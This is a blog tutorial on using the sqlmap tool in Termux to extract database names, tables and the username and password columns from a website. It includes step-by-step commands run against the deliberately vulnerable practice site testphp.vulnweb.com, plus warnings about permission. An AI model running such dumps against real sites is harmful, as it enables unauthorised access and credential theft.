Hack Website Using Sqlmap in Termux

In this post we learn to Hacking Website using Sqlmap in termux. We need Sqlmap installed in termux. In my previous post or video I learn to Install Sqlmap in termux.

Previous post link-https://termuxteachhindi.school.blog/how-to-install-sqlmap-website-hacking-tool-in-termux/

Video link-https://shrinkme.io/InstallSqlmapintermux

Before Starting:-
Then before starting ,We know that the how any website can be hacked. Means How the website is hack. What is the steps for that . Then first we learn about Website Hacking in shortly , because website Hacking is very big concept.
After that we learn to use Sqlmap. We learn to use of Sqlmap Commands. Where which command is used that we learn.

Then read near👇

How any website can be hacked

Now first we know that the how hackers can hacked any website. Which steps they use. Which tools they use & more But at first we learn some basic concepts that what is website & how website is make . Where is the data of website is store.

What is website:-

Website is the collection of webpages that published on a particular webserver. That means website is make by many webpages & by collecting that all webpages we upload that on webserver. Is made by collection of webpages. But how the webpages are made?.

How the webpages are made:-

For make a web page we know the languages that use for making webpages. Html,php, JavaScript, java, python, css,etc are the languages that use for web designing means for making webpages.

Where the Website data is stored:-

Before hacking website we know that the data of the website like webpages , information , private information are where stored. Because for website hacking we know the password & username of website. Then before that we know the where is the username & password is stored. Username & password is stored in website private data. Then where the website all private data is stored . Website all data & privet data is stored in database.

What is database:-

Database is a data structure that store the all important & private & all data of website. Database is a very important concept for hacking website. All website data is stored in database , then we first know that the which database is use website? . Because there are many type of databases. Then first we learn the types of database.

Types of database:-

I tell you some popular databases
1) MySQL 2) Microsoft SQL server 3) PostgreSQL 4) MongoDB 5) MariaDB 6) DB2 7) Oracle 8) Ornate

How database stored data:-

This is very important concept when be hack database of any website that in which form database stored data.

Database stored data in the form of tables & columns. Means it’s stored all data in tables.

There to hacking website:-

         There are 3 steps to hacking website.

1) Find the database :- First we know that the which database is used by website. Then first step is to find database.

2) Find tables in Database:- After finding database we go in that database & find the tables. Because I tell you that all data stored I database in the form of tables & columns. Then our second step is to find all tables in the database. After finding all tables we will select the tables that contains a private data. Then we select a tables name like user, administration, admin , private , secure . That contains privet data.

3) Finding columns in tables:- Then we go in a table which contains privet information. Then we find columns in that tables. After finding columns we see a columns like username, password ,email. Or other columns that contains a username or password. Then we select any columns & open it. Then we also open the columns that contains username or password .
         Then what? We know the password & Username. Then website is hacked.

But:-
       But it is not easy at its looks. For this we need a tool name sqlmap. With using Sqlmap tool it’s is so easy. Then first we learnt to sqlmap

Then read near👇

How to use Sqlmap:-

Then we learn to use of Sqlmap .

Why Sqlmap is used:-

Sqlmap is the open source python script used for test websites, vulnerability scanning, penetrating , & for Hacking database of website, searching a sql injection vulnerability in websites.

Which websites hack Sqlmap:-

Sqlmap hack the php websites that are vulnerable with sql injection vulnerability or other vulnerable websites.

How run Sqlmap in Termux:-

We learn in previous post to install Sqlmap in Termux & to run Sqlmap in Termux. Then we learn in shortly to run Termux. First go to the Sqlmap directory. Then run the sqlmap by typing this command ‘python sqlmap.py’

Follow the following steps :-

Step1:- Open the Termux

Step2:- Type Command ‘cd sqlmap’
Ex:- cd sqlmap

Step3:- Type Command ‘python sqlmap.py’ Ex:- python sqlmap.py By steps Sqlmap will run.

How to use Sqlmap in Termux:-

For using Sqlmap we should learnt the Sqlmap Commands . Because Sqlmap is work on Commands.

Then see near👇

How to see Sqlmap Commands:-

For seeing Sqlmap Commands we run a command ‘python sqlmap.py –help’ . We use ‘–help’ after ‘python Sqlmap.py’ because we not know about Sqlmap then we want to help from Sqlmap. Then we use ‘–help’ command to show help. By this command we views the all Commands of Sqlmap.

Follow the following commands:-

Step1:- (if Sqlmap is open) Type command ‘python sqlmap.py –help’
Ex:- python sqlmap.py –help

By this steps we view the all Commands of Sqlmap.

Uses of sqlmap commands:-

Then we learn the uses of commands . There are many commands . Then I tell you only some important command that use in website hacking.

1) ‘-u’ or ‘–url’ :- Is the first & important command use for selecting URL of any website. It’s important because first we selected the url of any website that we want to hack. To use this Commands first type ‘python sqlmap.py’ then type ‘-u’ then type url name.

Ex:- python sqlmap.py -u https://abc.com

2) ‘–dbs’ :- This is the very important command use for finding the database.& We know that database is very important for hacking website. Then we find database of website by this command. To use this Commands first type ‘python sqlmap.py’ then type url name by typing command ‘-u’ then type ‘–dbs’ command to find database.

Ex:- python sqlmap.py -u https://abc.com –dbs

3) ‘-D’ :- This command is used to select database. We find a database names by above command the for selecting the database name we use this command To use this command first type ‘python sqlmap.py’ then type url by command ‘-u’ then type command ‘-D’ & type database name.

Ex:- python sqlmap.py -u https://abc.com -D Mysql

4) ‘–tables’ :- This command is used to find tables in database. After finding database we select the database then for finding tables in that database we use this Commands. For use this command type ‘ python sqlmap.py’ then type url by ‘-u’ command then type database name by ‘-D’ command then type ‘–tables’ command for finding database.

Ex:- python sqlmap.py -u https:// abc.com -D Mysql –tables

5) ‘-T’:- This command is use to select the table. By above commands we find a ‘tables’ of ‘Mysql’ database of ‘https://abc.com’ website. Then we select a particular tables from tables then for selecting a table this command is used. To use this command first type ‘python sqlmap.py’ then type url by command ‘-u’ then type database name by ‘-D’ command then type ‘-T’ command to select table & then type table name which you want to select.

Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users

6) ‘–columns’ :- This command is use to find columns in tables. In above command we find tables name & select the tables. Then for finding columns in tables we use this command. To use this command type ‘python sqlmap.py’ then type url by command ‘-u’ then type database name by command ‘-D’ then type Table name by command ‘-T’ then type ‘–columns’ command for finding columns.

Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users –columns

7) ‘-C’ :- This command is use to select columns. In above command we find a columns . Then for selecting columns this command is used. To use this command type ‘python sqlmap.py’ the type url by ‘-u’ command then type database name by ‘-D’ command then type table name by ‘-T’ command then type ‘-C’ command to select column & then type column name that you want to open.

Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users -C username

8) ‘–dump’ :-This command is use to dump data of any column or tables . Means this command use to save data from any column or tables . In above we select a coloum then for save data of this column in our storage for this command is used. To use this command. First type ‘python sqlmap.py’ then type url by ‘-u’ command then type database name by ‘-D’ Command then type tables name by ‘-T ‘ commands then type column name by typing ‘-C’ command. Then type ‘–dump’ this command to dump data of column.

Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users -C username –dump

9) ‘–dump-all’ :- This command is used to dump all data. Means by this we can dump data of all columns, tables or also dump full database. To use this command type ‘–dump-all’ after the column or tables or database . By this command it’s save all data.

Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users -C username –dump-all
Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users –columns –dump-all
Ex:- python sqlmap.py -u https://abc.com -D Mysql -T users –dump-all
Ex:- python sqlmap.py -u https://abc.com -D Mysql –tables –dump-all

Are the some important Commands that we use to hack website .

Then let’s start to hack website using sqlmap in Termux .

Read near 👇

How to Hack website using sqlmap in Termux :-

Now we all known about website & website Hack & sqlmap then . Let’s start to hack website. First we need of website to hack .

We use ‘http://testphp.vulnweb.com/artists.php?artist=1’ this website to hack .

Because-
This website is vulnerable & this website is made for testing or scanning . Then we can use this website to hack legally. Then you also try on this but do not try on any other website before permission. If you do like this then it is illegal.

Warning!

1) please don’t try this steps on any website before permission of websites owner

2) please don’t use this steps for any elligal purpose

3) I learn you this steps for only education purpose. & For secure to your website form like this attacks.

Then follow the following steps:-

Step1:- Open the termux.

Step2:- Then type ‘cd sqlmap’ to go in sqlmap directory
Ex:- cd sqlmap

Step3:- then type ‘python sqlmap.py to run python script .
Ex:- python sqlmap.py

Step4:- Now we type website url for that we use ‘-u’ command then type website url. Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1

Step5:- Now we find database of this website . For finding database we use commands ‘–dbs’
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 –dbs

Step6:- Now press the enter button.
By this Commands we find a database of website.

We find a 2 database 1)acuart 2)information_schema

Step7:- we find a 2 databases then first we check first database . Then type the command ‘-D ‘ then type first database name acuart.
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart

Step8:- after selecting database then we find tables in that database. Then for finding tables type ‘–tables ‘ command.
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart –tables

Step9:- Then press. Enter button.

By this steps we find the tables in first database

We find 8 tables

Step10:- After finding tables we select table that can contain username or password. Then there is a table name ‘users’ that can contain username or password. Then we select this table. Then we use ‘-T’ Command to select table. Then first type ‘-T’ then type table name ‘users’
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users

Step1 1:- After selecting tableswe find column in selected table . For finding columns we use Command ‘–columns’. then type command –columns.
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users –columns

Step1 2:- The press enter button

By this command we find columns in ‘users’ table

We find a 8 Columns

Step1 3:- Now we find the columns in ‘users’ table . Now we see the 8 columns . Then the last column is ‘uname’ it means username . Means this column can contain username then first we select this ‘uname’ column by Command ‘-C’ . Then type ‘-C’ command then type ‘uname’.
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname

Step14:- Now for dumping the data of ‘uname’ column type the command ‘–dump’ Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname –dump

Step16:- Then press enter button

By this steps we can view the username of website.

We find a username of website , but I could not show to you.

Step1 7:- Now we find the columns which contains password. I want that the ‘pass’ column can contain the password. Then we select the ‘pass’ column by ‘-C’ command. Then first type ‘-C’ then type ‘pass’
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass

Step1 8:- Then type ‘–dump’ Command to dump password.
Ex:- python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass –dump

Step19:- Then press enter button.

By this Commands we find password of this website.

We find the password of website , but I could not show you.

Wow we find the username or password of this website means this website is Hacked.

We easily hack this website.

Then Now Bye bye

We meet in my next post